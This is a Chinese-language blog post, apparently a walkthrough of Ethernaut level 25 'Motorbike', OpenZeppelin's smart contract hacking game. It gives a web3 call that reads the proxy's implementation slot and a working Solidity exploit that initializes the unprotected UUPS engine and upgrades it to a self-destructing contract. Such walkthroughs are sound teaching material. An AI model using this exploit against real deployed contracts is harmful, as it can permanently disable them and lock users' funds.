# 智能合约黑客攻击 Ethernaut:  
 25. Motorbike

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-28
**URL:** https://paragraph.com/@leekdev/ethernaut-25-motorbike

## Content

Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目让 motorbike 合约不可用。Hack思路… 从slot中读取 engine 合约地址await web3.eth.getStorageAt(instance, '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc') 用 engine 的合约地址执行攻击// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; interface IEngine { function initialize() external; function upgradeToAndCall(address newImplementation, bytes memory data) external payable; } contract _motorbikeHackTool { function initialize() external { selfdestruct(payable(msg.sender)); } } contract MotorbikeHack { IEngine public exploitInst; constructor(address _target) { exploitInst = IEngine(_target); exploitInst.initialize(); exploitInst.upgradeToAndCall(address(new _motorbikeHackTool()), abi.encodeWithSignature("initialize()")); } } Hack案例…防范思路…参考资料ERC-1967: Proxy Storage SlotsUUPS Proxies: Tutorial (Solidity + JavaScript)packages/core/contracts/Initializable.sol

## Publication Information

- [Leek DEV](https://paragraph.com/@leekdev/): Publication homepage
- [All Posts](https://paragraph.com/@leekdev/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@leekdev): Subscribe to updates
- [Twitter](https://twitter.com/LeekDEV): Follow on Twitter